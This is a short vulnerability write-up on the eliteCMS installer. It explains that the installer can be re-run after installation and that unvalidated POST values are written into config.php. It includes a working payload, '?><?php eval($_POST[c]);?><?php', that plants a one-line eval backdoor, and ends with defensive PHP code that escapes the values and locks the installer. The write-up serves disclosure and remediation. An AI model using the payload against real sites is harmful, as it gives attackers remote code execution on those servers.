eliteCMS's installer is not locked after installation finishes, so an attacker can re-run the installation simply by visiting the installer URL.

A second vulnerability is that the installer can write a one-line backdoor directly into admin/includes/config.php.

Let's look at the code:
    ...
    elseif ($_GET['step'] == "4") {
        // Target file: the admin config, overwritten on every run of step 4
        $file = "../admin/includes/config.php";
        $write = "<?php\n";
        $write .= "/**\n";
        $write .= "*\n";
        $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
        ...omitted...
        $write .= "*\n";
        $write .= "*/\n";
        $write .= "\n";
        // Session values are interpolated straight into the generated PHP source
        $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
        $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
        $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
        $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
        $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
        $write .= "if (!\$connection) {\n";
        $write .= "    die(\"Database connection failed\" .mysql_error());\n";
        $write .= "    \n";
        $write .= "} \n";
        $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
        $write .= "if (!\$db_select) {\n";
        $write .= "    die(\"Database select failed\" .mysql_error());\n";
        $write .= "    \n";
        $write .= "} \n";
        $write .= "?>\n";

        // The assembled source is written out with no escaping or validation
        $writer = fopen($file, 'w');
        ...

Now look at this code:

    $_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
    $_SESSION['DB_NAME'] = $_POST['DB_NAME'];
    $_SESSION['DB_USER'] = $_POST['DB_USER'];
    $_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are copied from POST without any validation. If the database name is POSTed as:

    "?><?php eval($_POST[c]);?><?php

a one-line backdoor is written into /admin/includes/config.php.
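The defensive fix for both problems, as an added example that is not eliteCMS code: emit each setting with var_export() so it can only ever become a quoted string literal, restrict the identifier-like fields to a safe character set, and refuse to run the installer once a config file already exists. The function names and the sample input are constructed for this illustration.

```php
<?php
// Added example, not eliteCMS code: build the DB config so that an attacker-
// supplied value such as "?><?php ...?><?php stays inside a string literal
// instead of becoming executable PHP.

function buildConfig(array $settings): string {
    $keys = ['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'];
    $out = "<?php\n";
    foreach ($keys as $key) {
        if (!isset($settings[$key]) || !is_string($settings[$key])) {
            throw new InvalidArgumentException("missing $key");
        }
        $value = $settings[$key];
        // Host, database and user names get a strict whitelist; the password
        // may contain anything because var_export() escapes it below.
        if ($key !== 'DB_PASS' && !preg_match('/^[A-Za-z0-9_.:-]{1,64}$/', $value)) {
            throw new InvalidArgumentException("invalid characters in $key");
        }
        // var_export(..., true) yields a single-quoted literal with ' and \
        // escaped, unlike the original "define(\"...\")" string interpolation.
        $out .= sprintf("define('%s', %s);\n", $key, var_export($value, true));
    }
    // No closing ?> tag, so nothing trailing can be parsed as output.
    return $out;
}

// Installer lock: step handlers must refuse to run once a config exists.
function installerLocked(string $configPath): bool {
    return is_file($configPath) && filesize($configPath) > 0;
}

// Constructed sample input reproducing the payload discussed above.
$sample = [
    'DB_SERVER' => 'localhost',
    'DB_NAME'   => "?><?php eval(\$_POST[c]);?><?php",
    'DB_USER'   => 'elite',
    'DB_PASS'   => "p'ass\\word",
];

if (installerLocked(__DIR__ . '/admin/includes/config.php')) {
    exit("installation already completed\n");
}
try {
    echo buildConfig($sample);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```

With the sample above the DB_NAME value fails the whitelist and nothing is written; a password containing quotes or backslashes passes and is emitted as a correctly escaped literal.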